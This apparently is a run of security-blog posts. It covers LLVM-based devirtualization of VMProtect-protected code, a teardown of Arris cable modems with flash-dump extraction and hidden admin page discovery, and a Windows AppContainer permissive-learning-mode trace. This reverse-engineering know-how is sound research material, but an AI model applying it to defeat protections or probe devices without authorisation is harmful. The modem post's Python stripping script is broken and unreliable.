The major issue to deal with when attempting a 1:1 mapping is related to how the recompilation may unexpectedly change the stack layout. This could happen if, during the register allocation phase, some spilling slot is allocated on the stack. If these additional spilling+reloading semantics are not adequately handled, some pointers used by the function may access unforeseen stack slots with disastrous results.

Results showcase

The following log files contain the output of the PoC tool executed on functions showcasing different code constructs (e.g. loop, jump table) and accessing different data structures (e.g. GS segment, DS segment, KUSER_SHARED_DATA structure):

  • 0x140001d10@DevirtualizeMe1: calling KERNEL32.dll::GetTickCount64 and literally included as nostalgia kicked in;
  • 0x140001e60@DevirtualizeMe2: executing an unsupported cpuid and with some nicely recovered llvm.fshl.i64 intrinsic calls used as rotations;
  • 0x140001d20@DevirtualizeMe2: calling ADVAPI32.dll::GetUserNameW and with a nicely recovered llvm.bswap.i64 intrinsic call;
  • 0x13001334@EMP: DllEntryPoint, calling another internal function (intra-call);
  • 0x1301d000@EMP: calling KERNEL32.dll::LoadLibraryA, KERNEL32.dll::GetProcAddress, calling other internal functions (intra-calls), executing several unsupported cpuid instructions;
  • 0x130209c0@EMP: accessing KUSER_SHARED_DATA and with nicely synthesized conditional jumps;
  • 0x1400044c0@Switches64: executing the CPUID handler and devirtualized with PointersHoisting disabled to preserve the switch case.

Searching for the @F_ pattern in your favourite text editor will bring you directly to each devirtualized VmStub, immediately preceded by the textual representation of the recovered CFG.

Afterword

I apologize for the length of the series, but I didn’t want to discard bits of information that could possibly help others approaching LLVM as a deobfuscation framework, especially knowing that, at this time, several parties are currently working on their own LLVM-based solution. I felt like showcasing its effectiveness and limitations on a well-known obfuscator was a valid way to dive through most of the details. Please note that the process described in the posts is just one of the many possible ways to approach the problem, and by no means the best way.

The source code of the proof-of-concept should be considered an experimentation playground, with everything that involves (e.g. bugs, unhandled edge cases, non production-ready quality). As a matter of fact, some of the components are barely sketched to let me focus on improving the LLVM optimization pipeline. In the future I’ll try to find the time to polish most of it, but in the meantime I hope it can at least serve as a reference to better understand the explained concepts.

Feel free to reach out with doubts, questions or even flaws you may have found in the process, I’ll be more than happy to allocate some time to discuss them.

I’d like to thank:

  • Peter, for introducing me to LLVM and working on SATURN together.
  • mrexodia and mrphrazer, for the in-depth review of the posts.
  • justmusjle, for enhancing the colors used by the diagrams.
  • Secret Club, for their suggestions and series hosting.

See you at the next LLVM adventure!

Tickling VMProtect with LLVM: Part 2

By: fvrmatteo
8 September 2021 at 23:00

This post will introduce the concepts of expression slicing and partial CFG, combining them to implement an SMT-driven algorithm to explore the virtualized CFG. Finally, some words will be spent on introducing the LLVM optimization pipeline, its configuration and its limitations.

Poor man’s slicer

Slicing a symbolic expression to be able to evaluate it, throw it at an SMT solver or match it against some pattern is something extremely common in all symbolic reasoning tools. Luckily for us this capability is trivial to implement with yet another C++ helper function. This technique has been referred to as Poor man’s slicer in the SATURN paper, hence the title of the section.

In the VMProtect context we are mainly interested in slicing one expression: the next program counter. We want to do that either while exploring the single VmBlocks (that, once connected, form a VmStub) or while exploring the VmStubs (that, once connected, form a VmFunction). The following C++ code is meant to keep only the computations related to the final value of the virtual instruction pointer at the end of a VmBlock or VmStub:

extern "C"
size_t HelperSlicePC(
  size_t rax, size_t rbx, size_t rcx, size_t rdx, size_t rsi,
  size_t rdi, size_t rbp, size_t rsp, size_t r8, size_t r9,
  size_t r10, size_t r11, size_t r12, size_t r13, size_t r14,
  size_t r15, size_t flags,
  size_t KEY_STUB, size_t RET_ADDR, size_t REL_ADDR)
{
  // Allocate the temporary virtual registers
  VirtualRegister vmregs[30] = {0};
  // Allocate the temporary passing slots
  size_t slots[30] = {0};
  // Initialize the virtual registers
  size_t vsp = rsp;
  size_t vip = 0;
  // Force the relocation address to 0
  REL_ADDR = 0;
  // Execute the virtualized code
  vip = HelperStub(
    rax, rbx, rcx, rdx, rsi, rdi,
    rbp, rsp, r8, r9, r10, r11,
    r12, r13, r14, r15, flags,
    KEY_STUB, RET_ADDR, REL_ADDR,
    vsp, vip, vmregs, slots);
  // Return the sliced program counter
  return vip;
}

The acute observer will notice that the function definition is basically identical to the HelperFunction definition given before, with the fundamental difference that the arguments are passed by value and therefore useful if related to the computation of the sliced expression, but with their liveness scope ending at the end of the function, which guarantees that there won’t be store operations to the host context that could possibly bloat the code.

The steps to use the above helper function are:

  • The HelperSlicePC is cloned into a new throwaway function;
  • The call to the HelperStub function is swapped with a call to the VmBlock or VmStub of which we want to slice the final instruction pointer;
  • The called function is forcefully inlined into the HelperSlicePC function;
  • The optimization pipeline is executed on the cloned HelperSlicePC function resulting in the slicing of the final instruction pointer expression as a side-effect of the optimizations.

The following LLVM-IR snippet shows the idea in action, resulting in the final optimized function where the condition and edges of the conditional branch are clearly visible.

define dso_local i64 @HelperSlicePC(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) #5 {
  %1 = call { i32, i32, i32, i32 } asm "  xchgq  %rbx,${1:q}\0A  cpuid\0A  xchgq  %rbx,${1:q}", "={ax},=r,={cx},={dx},0,~{dirflag},~{fpsr},~{flags}"(i32 1) #4, !srcloc !9
  %2 = extractvalue { i32, i32, i32, i32 } %1, 0
  %3 = and i32 %2, 4080
  %4 = icmp eq i32 %3, 4064
  %5 = select i1 %4, i64 5371013457, i64 5371013227
  ret i64 %5
}

In the following section we’ll see how variations of this technique are used to explore the virtualized control flow graph, solve the conditional branches, and recover the switch cases.

Exploration

The exploration of a virtualized control flow graph can be done in different ways and usually protectors like VMProtect or Themida show a distinctive shape that can be pattern-matched with ease, simplified and parsed to obtain the outgoing edges of a conditional block.

The logic used by different VMProtect conditional jump versions has been detailed in the past, so in this section we are going to delve into an SMT-driven algorithm based on the incremental construction of the explored control flow graph and specifically built on top of the slicing logic explained in the previous section.

Given the generic nature of the detailed algorithm, nothing stops it from being used on other protectors. The usual catch is obviously caused by protections embedding hard to solve constraints that may hinder the automated solving phase, but the construction and propagation of the partial CFG constraints and expressions could still be useful in practice to pull out less automated exploration algorithms, or to identify and simplify anti-dynamic symbolic execution tricks (e.g. dummy loops leading to path explosion that could be simplified by LLVM’s loop optimization passes or custom user passes).

Partial CFG

A partial control flow graph is a control flow graph built connecting the currently explored basic blocks given the known edges between them. The idea behind building it, is that each time that we explore a new basic block, we gather new outgoing edges that could lead to new unexplored basic blocks, or even to known basic blocks. Every new edge between two blocks is therefore adding information to the entire control flow graph and we could actually propagate new useful constraints and values to enable stronger optimizations, possibly easing the solving of the conditional branches or even changing a known branch from unconditional to conditional.

Let’s look at two motivating examples of why building a partial CFG may be a good idea to be able to replicate the kind of reasoning usually implemented by symbolic execution tools, with the addition of useful built-in LLVM passes.

Motivating example #1

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlock and purple the VmBlock of interest for the example.

Motivating example 1

Let’s assume we just solved the outgoing edges for the basic block A, obtaining two connections leading to the new basic blocks B and C. Now assume that we sliced the branch condition of the sole basic block B, obtaining an access into a constant array with a 64 bits symbolic index. Enumerating all the valid indices may be a non-trivial task, so we may want to restrict the search using known constraints on the symbolic index that, if present, are most likely going to come from the chain(s) of predecessor(s) of the basic block B.

To draw a symbolic execution parallel, this is the case where we want to collect the path constraints from a certain number of predecessors (e.g. we may want to incrementally harvest the constraints, because sometimes the needed constraint is locally near to the basic block we are solving) and chain them to be fed to an SMT solver to execute a successful enumeration of the valid indices.

Tools like Souper automatically harvest the set of path constraints while slicing an expression, so building the partial control flow graph and feeding it to Souper may be sufficient for the task. Additionally, with the LLVM API to walk the predecessors of a basic block it’s also quite easy to obtain the set of needed constraints and, when available, we may also take advantage of known-to-be-true conditions provided by the llvm.assume intrinsic.

Motivating example #2

Consider the following partial control flow graph, where blue represents the VmBlock that has just been processed, orange the unprocessed VmBlocks, purple the VmBlock of interest for the example, dashed red arrows the edges of interest for the example and the solid green arrow an edge that has just been processed.

Motivating example 2

Let’s assume we just solved the outgoing edges for the basic block E, obtaining two connections leading to a new block G and a known block B. In this case we know that we detected a jump to the previously visited block B (edge in green), which is basically forming a loop chain (BCEB) and we know that starting from B we can reach two edges (BC and DF, marked in dashed red) that are currently known as unconditional, but that, given the newly obtained edge EB, may not be anymore and therefore will need to be proved again. Building a new partial control flow graph including all the newly discovered basic block connections and slicing the branch of the blocks B and D may now show them as conditional.

As a real world case, when dealing with concolic execution approaches, the one mentioned above is the usual pattern that arises with index-based loops, starting with a known concrete index and running till the index reaches an upper or lower bound N. During the first N-1 executions the tool would take the same path and only at the iteration N the other path would be explored. That’s the reason why concolic and symbolic execution tools attempt to build heuristics or use techniques like state-merging to avoid running into path explosion issues (or at best executing the loop N times).

Building the partial CFG with LLVM instead, would mark the loop back edge as unconditional the first time, but building it again, including the knowledge of the newly discovered back edge, would immediately reveal the loop pattern. The outcome is that LLVM would now be able to apply its loop analysis passes, the user would be able to use the API to build ad-hoc LoopPass passes to handle special obfuscation applied to the loop components (e.g. encoded loop variant/invariant) or the SMT solvers would be able to treat newly created Phi nodes at the merge points as symbolic variables.

The following LLVM-IR snippet shows the sliced partial control flow graphs obtained during the exploration of the virtualized assembly snippet presented below.

start:
  mov rax, 2000
  mov rbx, 0
loop:
  inc rbx
  cmp rbx, rax
  jne loop

The original assembly snippet.

define dso_local i64 @FirstSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  %1 = call i64 @HelperKeepPC(i64 5369464257)
  ret i64 %1
}

The first partial CFG obtained during the exploration phase

define dso_local i64 @SecondSlice(i64 %rax, i64 %rbx, i64 %rcx, i64 %rdx, i64 %rsi, i64 %rdi, i64 %rbp, i64 %rsp, i64 %r8, i64 %r9, i64 %r10, i64 %r11, i64 %r12, i64 %r13, i64 %r14, i64 %r15, i64 %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  %5 = select i1 %4, i64 5369183207, i64 5369464257
  %6 = call i64 @HelperKeepPC(i64 %5)
  %7 = icmp eq i64 %6, 5369464257
  br i1 %7, label %1, label %8

8:                                                ; preds = %1
  ret i64 233496237
}

The second partial CFG obtained during the exploration phase. The block 8 is returning the dummy 0xdeaddead (233496237) value, meaning that the VmBlock instructions haven’t been lifted yet.

define dso_local i64 @F_0x14000101f_NoLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  br label %1

1:                                                ; preds = %1, %0
  %2 = phi i64 [ 0, %0 ], [ %3, %1 ]
  %3 = add i64 %2, 1
  %4 = icmp eq i64 %2, 1999
  br i1 %4, label %5, label %1

5:                                                ; preds = %1
  store i64 %3, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The final CFG obtained at the completion of the exploration phase.

define dso_local i64 @F_0x14000101f_WithLoopOpt(i64* noalias nonnull align 8 dereferenceable(8) %rax, i64* noalias nonnull align 8 dereferenceable(8) %rbx, i64* noalias nonnull align 8 dereferenceable(8) %rcx, i64* noalias nonnull align 8 dereferenceable(8) %rdx, i64* noalias nonnull align 8 dereferenceable(8) %rsi, i64* noalias nonnull align 8 dereferenceable(8) %rdi, i64* noalias nonnull align 8 dereferenceable(8) %rbp, i64* noalias nonnull align 8 dereferenceable(8) %rsp, i64* noalias nonnull align 8 dereferenceable(8) %r8, i64* noalias nonnull align 8 dereferenceable(8) %r9, i64* noalias nonnull align 8 dereferenceable(8) %r10, i64* noalias nonnull align 8 dereferenceable(8) %r11, i64* noalias nonnull align 8 dereferenceable(8) %r12, i64* noalias nonnull align 8 dereferenceable(8) %r13, i64* noalias nonnull align 8 dereferenceable(8) %r14, i64* noalias nonnull align 8 dereferenceable(8) %r15, i64* noalias nonnull align 8 dereferenceable(8) %flags, i64 %KEY_STUB, i64 %RET_ADDR, i64 %REL_ADDR) {
  store i64 2000, i64* %rbx, align 8
  store i64 2000, i64* %rax, align 8
  ret i64 5368713281
}

The loop-optimized final CFG obtained at the completion of the exploration phase.

The FirstSlice function shows that a single unconditional branch has been detected, identifying the bytecode address 0x1400B85C1 (5369464257), this is because there’s no knowledge of the back edge and the comparison would be cmp 1, 2000. The SecondSlice function instead shows that a conditional branch has been detected selecting between the bytecode addresses 0x140073BE7 (5369183207) and 0x1400B85C1 (5369464257). The comparison is now done with a symbolic PHINode. The F_0x14000101f_WithLoopOpt and F_0x14000101f_NoLoopOpt functions show the fully devirtualized code with and without loop optimizations applied.

Pseudocode

Given the knowledge obtained from the motivating examples, the pseudocode for the automated partial CFG driven exploration is the following:

  1. We initialize the algorithm creating:

    • A stack of addresses of VmBlocks to explore, referred to as Worklist;
    • A set of addresses of explored VmBlocks, referred to as Explored;
    • A set of addresses of VmBlocks to reprove, referred to as Reprove;
    • A map of known edges between the VmBlocks, referred to as Edges.
  2. We push the address of the entry VmBlock into the Worklist;
  3. We fetch the address of a VmBlock to explore, we lift it to LLVM-IR if met for the first time, we build the partial CFG using the knowledge from the Edges map and we slice the branch condition of the current VmBlock. Finally we feed the branch condition to Souper, which will process the expression harvesting the needed constraints and converting it to an SMT query. We can then send the query to an SMT solver, asking for the valid solutions, incrementally rejecting the known solutions up to some limit (worst case) or till all the solutions have been found.
  4. Once we obtained the outgoing edges for the current VmBlock, we can proceed with updating the maps and sets:

    • We verify if each solved edge is leading to a known VmBlock; if it is, we verify if this connection was previously known. If unknown, it means we found a new predecessor for a known VmBlock and we proceed with adding the addresses of all the VmBlocks reachable by the known VmBlock to the Reprove set and removing them from the Explored set; to speed things up, we can eventually skip each VmBlock known to be firmly unconditional;
    • We update the Edges map with the newly solved edges.
  5. At this point we check if the Worklist is empty. If it isn’t, we jump back to step 3. If it is, we populate it with all the addresses in the Reprove set, clearing it in the process and jumping back to step 3. If also the Reprove set is empty, it means we explored the whole CFG and eventually reproved all the VmBlocks that obtained new predecessors during the exploration phase.

As mentioned at the start of the section, there are many ways to explore a virtualized CFG and using an SMT-driven solution may generalize most of the steps. Obviously, it brings its own set of issues (e.g. hard to solve constraints), so one could eventually fall back to the pattern matching based solution at need. As expected, the pattern matching based solution would also blindly explore unreachable paths at times, so a mixed solution could really offer the best CFG coverage.

The pseudocode presented in this section is a simplified version of the partial CFG based exploration algorithm used by SATURN at this point in time, streamlined from a set of reasonings that are unnecessary while exploring a CFG virtualized by VMProtect.

Pipeline

So far we hinted at the underlying usage of LLVM’s optimization and analysis passes multiple times through the sections, so we can finally take a look at: how they fit in, their configuration and their limitations.

Managing the pipeline

Running the whole -O3 pipeline may not always be the best idea, because we may want to use only a subset of passes, instead of wasting cycles on passes that we know a priori don’t have any effect on the lifted LLVM-IR code. Additionally, by default, LLVM is providing a chain of optimizations which is executed once, is meant to optimize non-obfuscated code and should be as efficient as possible.

Although, in our case, we have different needs and want to be able to:

  • Add some custom passes to tackle context-specific problems and do so at precise points in the pipeline to obtain the best possible output, while avoiding phase ordering issues;
  • Iterate the optimization pipeline more than once, ideally until our custom passes can’t apply any more changes to the IR code;
  • Be able to pass custom flags to the pipeline to toggle some passes at will and eventually feed them with information obtained from the binary (e.g. access to the binary sections).

LLVM provides a FunctionPassManager class to craft our own pipeline, using LLVM’s passes and custom passes. The following C++ snippet shows how we can add a mix of passes that will be executed in order until there won’t be any more changes or until a threshold will be reached:

void optimizeFunction(llvm::Function *F, OptimizationGuide &G) {
  // Fetch the Module
  auto *M = F->getParent();
  // Create the function pass manager
  llvm::legacy::FunctionPassManager FPM(M);
  // Initialize the pipeline
  llvm::PassManagerBuilder PMB;
  PMB.OptLevel = 3;
  PMB.SizeLevel = 2;
  PMB.RerollLoops = false;
  PMB.SLPVectorize = false;
  PMB.LoopVectorize = false;
  PMB.Inliner = createFunctionInliningPass();
  // Add the alias analysis passes
  FPM.add(createCFLSteensAAWrapperPass());
  FPM.add(createCFLAndersAAWrapperPass());
  FPM.add(createTypeBasedAAWrapperPass());
  FPM.add(createScopedNoAliasAAWrapperPass());
  // Add some useful LLVM passes
  FPM.add(createCFGSimplificationPass());
  FPM.add(createSROAPass());
  FPM.add(createEarlyCSEPass());
  // Add a custom pass here
  if (G.RunCustomPass1)
    FPM.add(createCustomPass1(G));
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Add a custom pass here
  if (G.RunCustomPass2)
    FPM.add(createCustomPass2(G));
  FPM.add(createGVNHoistPass());
  FPM.add(createGVNSinkPass());
  FPM.add(createDeadStoreEliminationPass());
  FPM.add(createInstructionCombiningPass());
  FPM.add(createCFGSimplificationPass());
  // Execute the pipeline
  size_t minInsCount = F->getInstructionCount();
  size_t pipExeCount = 0;
  FPM.doInitialization();
  do {
    // Reset the IR changed flag
    G.HasChanged = false;
    // Run the optimizations
    FPM.run(*F);
    // Check if the function changed
    size_t curInsCount = F->getInstructionCount();
    if (curInsCount < minInsCount) {
      minInsCount = curInsCount;
      G.HasChanged |= true;
    }
    // Increment the execution count
    pipExeCount++;
  } while (G.HasChanged && pipExeCount < 5);
  FPM.doFinalization();
}

The OptimizationGuide structure can be used to pass information to the custom passes and control the execution of the pipeline.

Configuration

As previously stated, the LLVM default pipeline is meant to be as efficient as possible, therefore it’s configured with a tradeoff between efficiency and efficacy in mind. While devirtualizing big functions it’s not uncommon to see the effects of the stricter configurations employed by default. But an example is worth a thousand words.

In the Godbolt UI we can see on the left a snippet of LLVM-IR code that is storing i32 values at increasing indices of a global array named arr. The store at line 96, writing the value 91 at arr[1], is a bit special because it is fully overwriting the store at line 6, writing the value 1 at arr[1]. If we look at the upper right result, we see that the DSE pass was applied, but somehow it didn’t do its job of removing the dead store at line 6. If we look at the bottom right result instead, we see that the DSE pass managed to achieve its goal and successfully killed the dead store at line 6. The reason for the difference is entirely associated to a conservative configuration of the DSE pass, which by default (at the time of writing), is walking up to 90 MemorySSA definitions before deciding that a store is not killing another post-dominated store. Setting the MemorySSAUpwardsStepLimit to a higher value (e.g. 100 in the example) is definitely something that we want to do while deobfuscating some code.

Each pass that we are going to add to the custom pipeline is going to have configurations that may be giving suboptimal deobfuscation results, so it’s a good idea to check their C++ implementation and figure out if tweaking some of the options may improve the output.

Limitations

When tweaking some configurations is not giving the expected results, we may have to dig deeper into the implementation of a pass to understand if something is hindering its job, or roll up our sleeves and develop a custom LLVM pass. Some examples on why digging into a pass implementation may lead to fruitful improvements follow.

IsGuaranteedLoopInvariant (DSE, MSSA)

While looking at some devirtualized code, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diffs: D96979, D97155. The bottom line is that the IsGuarenteedLoopInvariant function used by the DSE and MSSA passes was not using the safe assumption that a pointer computed in the entry block is, by design, guaranteed to be loop invariant as the entry block of a Function is guaranteed to have no predecessors and not to be part of a loop.

GetPointerBaseWithConstantOffset (DSE)

While looking at some devirtualized code that was accessing memory slots of different sizes, I noticed some clearly-dead stores that weren’t removed by the DSE pass, even though the tweaked configurations were enabled. A minimal example of the problem, its explanation and solution are provided in the following diff: D97676. The bottom line is that while computing the partially overlapping memory stores, the DSE was considering only memory slots with the same base address, ignoring fully overlapping stores offsetted between each other. The solution is making use of another patch which is providing information about the offsets of the memory slots: D93529.

Shift-Select folding (InstCombine)

And obviously there is no two without three! Nah, just kidding, a patch I wanted to get accepted to simplify one of the recurring patterns in the computation of the VMProtect conditional branches has been on pause because InstCombine is an extremely complex piece of code and additions to it, especially if related to uncommon patterns, are unwelcome and seen as possibly bloating and slowing down the entire pipeline. Additional information on the pattern and the reasons that hinder its folding are available in the following differential: D84664. Nothing stops us from maintaining our own version of InstCombine as a custom pass, with ad-hoc patterns specifically selected for the obfuscation under analysis.

What’s next?

In Part 3 we’ll have a look at a list of custom passes necessary to reach a superior output quality. Then, some words will be spent on the handling of the unsupported instructions and on the recompilation process. Last but not least, the output of 6 devirtualized functions, with varying code constructs, will be shown.

ARRIS CABLE MODEM TEARDOWN

8 September 2021 at 13:03

Picked up one of these a little while back at the behest of a good friend.

https://www.surfboard.com/globalassets/surfboard-new/products/sb8200/sb8200-pro-detail-header-hero-1.png

It’s an Arris Surfboard SB8200 and is one of the most popular cable modems out there. Other than the odd CVE here and there and a confirmation that Cable Haunt could crash the device, there doesn’t seem to be much other research on these things floating around.

Well, unfortunately, that’s still the case, but I’d like it to change. Due to other priorities, I’ve gotta shelve this project for the time being, so I’m releasing this blog as a write-up to kickstart someone else that may be interested in tearing this thing apart, or at the very least, it may provide a quick intro to others pursuing similar projects.

THE HARDWARE

There are a few variations of this device floating around. My colleague, Nick Miles, and I each purchased one of these from the same link… and each received totally different versions. He received the CM8200a while I received the SB8200. They’re functionally the same but have a few hardware differences.

Since there isn’t any built-in wifi or other RF emission from these modems, we’re unable to rely on images pilfered from FCC-related documents and certification labs. As such, we’ve got to tear it apart for ourselves. See the following images for details.

Top of SB8200
Bottom of SB8200 (with heatsink)
Closeup of Flash Storage
Broadcom Chip (under heatsink)
Top of CM8200a

As can be seen in the above images, there are a few key differences between these two revisions of the product. The SB8200 utilizes a single chip for all storage, whereas the CM8200a has two chips. The CM8200a also has two serial headers (pictured at the bottom of the image). Unfortunately, these headers only provide bootlog output and are not interactive.

THE FIRMWARE

Arris states on its support pages for these devices that all firmware is to be ISP controlled and isn’t available for download publicly. After scouring the internet, I wasn’t able to find a way around this limitation.

So… let’s dump the flash storage chips. As mentioned in the previous section, the SB8200 uses a single NAND chip whereas the CM8200a has two chips (SPI and NAND). I had some issues acquiring the tools to reliably dump my chips (multiple failed AliExpress orders for TSOP adapters), so we’re relying exclusively on the CM8200a dump from this point forward.

Dumping the contents of flash chips is mostly a matter of just having the right tools at your disposal. Nick removed the chips from the board, wired them up to various adapters, and dumped them using Flashcat.

SPI Chip Harness
SPI Chip Connected to Flashcat
NAND Chip Removed and Placed in Adapter
Readout of NAND Chip in Flashcat

PARSING THE FIRMWARE

Parsing NAND dumps is always a pain. The usual stock tools did us dirty (binwalk, ubireader, etc.), so we had to resort to actually doing some work for ourselves.

Since consumer routers and such are notorious for having hidden admin pages, we decided to run through some common discovery lists. We stumbled upon arpview.cmd and sysinfo.cmd.

Details on sysinfo.cmd

Jackpot.

Since we know the memory layout is different on each of our sample boards (SB8200 above), we’ll need to use the layout of the CM8200a when interacting with the dumps:

Creating 7 MTD partitions on “brcmnand.1”:
0x000000000000–0x000000620000 : “flash1.kernel0”
0x000000620000–0x000000c40000 : “flash1.kernel1”
0x000000c40000–0x000001fa0000 : “flash1.cm0”
0x000001fa0000–0x000003300000 : “flash1.cm1”
0x000003300000–0x000005980000 : “flash1.rg0”
0x000005980000–0x000008000000 : “flash1.rg1”
0x000000000000–0x000008000000 : “flash1”
brcmstb_qspi f04a0920.spi: using bspi-mspi mode
brcmstb_qspi f04a0920.spi: unable to get clock using defaults
m25p80 spi32766.0: found w25q32, expected m25p80
m25p80 spi32766.0: w25q32 (4096 Kbytes)
11 ofpart partitions found on MTD device spi32766.0
Creating 11 MTD partitions on “spi32766.0”:
0x000000000000–0x000000100000 : “flash0.bolt”
0x000000100000–0x000000120000 : “flash0.macadr”
0x000000120000–0x000000140000 : “flash0.nvram”
0x000000140000–0x000000160000 : “flash0.nvram1”
0x000000160000–0x000000180000 : “flash0.devtree0”
0x000000180000–0x0000001a0000 : “flash0.devtree1”
0x0000001a0000–0x000000200000 : “flash0.cmnonvol0”
0x000000200000–0x000000260000 : “flash0.cmnonvol1”
0x000000260000–0x000000330000 : “flash0.rgnonvol0”
0x000000330000–0x000000400000 : “flash0.rgnonvol1”
0x000000000000–0x000000400000 : “flash0”

This info gives us pretty much everything we need: NAND partitions, filesystem types, architecture, etc.

Since stock tools weren’t playing nice, here’s what we did:

Separate Partitions Manually

Extract the portion of the dump we’re interested in looking at:

dd if=dump.bin of=rg1 bs=1 count=0x2680000 skip=0x5980000

Strip Spare Data

Strip spare data (also referred to as OOB data in some places) from each section. From chip documentation, we know that the page size is 2048 with a spare size of 64.

NAND storage has a few different options for memory layout, but the most common are: separate and adjacent.

From the SB8200 boot log, we have the following line:

brcmstb_nand f04a2800.nand: detected 128MiB total, 128KiB blocks, 2KiB pages, 16B OOB, 8-bit, BCH-4

This hints that we are likely looking at an adjacent layout. The following python script will handle stripping the spare data out of our dump.

import sys
data_area = 512
spare = 16
combined = data_area + spare
with open(‘rg1’, ‘rb’) as f:
dump = f.read()
count = int(len(dump) / combined)
out = b’’
for i in range(count):
out = out + dump[i*block : i*combined + data_area]
with open(‘rg1_stripped’, ‘wb’) as f:
f.write(out)

Change Endianness

From documentation, we know that the Broadcom chip in use here is Big Endian ARMv8. The systems and tools we’re performing our analysis with are Little Endian, so we’ll need to do some conversions for convenience. This isn’t a foolproof solution but it works well enough because UBIFS is a fairly simple storage format.

with open('rg1_stripped', 'rb') as f:
dump = f.read()
with open('rg1_little', 'wb') as f:
# Page size is 2048
block = 2048
nblocks = int(len(dump) / block)

# Iterate over blocks, byte swap each 32-bit value
for i in range(0, nblocks):
current_block = dump[i*block:(i+1)*block]
j = 0
while j < len(current_block):
section = current_block[j:j+4]
f.write(section[::-1])
j = j + 4

Extract

Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs

Conclusion

Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!


ARRIS CABLE MODEM TEARDOWN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

LowBox Token Permissive Learning Mode

By: tiraniddo
7 September 2021 at 06:53

I was recently asked about this topic and so I thought it'd make sense to put it into a public blog post so that everyone can benefit. Windows 11 (and Windows Server 2022) has a new feature for tokens which allow the kernel to perform the normal LowBox access check, but if it fails log the error rather than failing with access denied. 

This feature allows you to start an AppContainer sandbox process, run a task, and determine what parts of that would fail if you actually tried to sandbox a process. This makes it much easier to determine what capabilities you might need to grant to prevent your application from crashing if you tried to actually apply the sandbox. It's a very useful diagnostic tool, although whether it'll be documented by Microsoft remains to be seen. Let's go through a quick example of how to use it.

First you need to start an ETW trace for the Microsoft-Windows-Kernel-General provider with the KERNEL_GENERAL_SECURITY_ACCESSCHECK keyword (value 0x20) enabled. In an administrator PowerShell console you can run the following:

PS> $name = 'AccessTrace'
PS> New-NetEventSession -Name $name -LocalFilePath "$env:USERPROFILE\access_trace.etl" | Out-Null
PS> Add-NetEventProvider -SessionName $name -Name "Microsoft-Windows-Kernel-General" -MatchAllKeyword 0x20 | Out-Null
PS> Start-NetEventSession -Name $name

This will start the trace session and log the events to access_trace.etl file if your home directory. As this is ETW you could probably do a real-time trace or enable stack tracing to find out what code is actually failing, however for this example we'll do the least amount of work possible. This log is also used for things like Adminless which I've blogged about before.

Now you need to generate some log events. You just need to add the permissiveLearningMode capability when creating the lowbox token or process. You can almost certainly add it to your application's manifest as well when developing a sandboxed UWP application, but we'll assume here that we're setting up the sandbox manually.

PS> $cap = Get-NtSid -CapabilityName 'permissiveLearningMode'
PS> $token = Get-NtToken -LowBox -PackageSid ABC -CapabilitySid $cap
PS> Invoke-NtToken $token { "Hello" | Set-Content "$env:USERPOFILE\test.txt" }

The previous code creates a lowbox token with the capability and writes to a file in the user's profile. This would normally fail as the user's profile doesn't grant any AppContainer access to write to it. However, you should find the write succeeded. Now, back in the admin PowerShell console you'll want to stop the trace and cleanup the session.

PS> Stop-NetEventSession -Name $name
PS> Remove-NetEventSession -Name $name

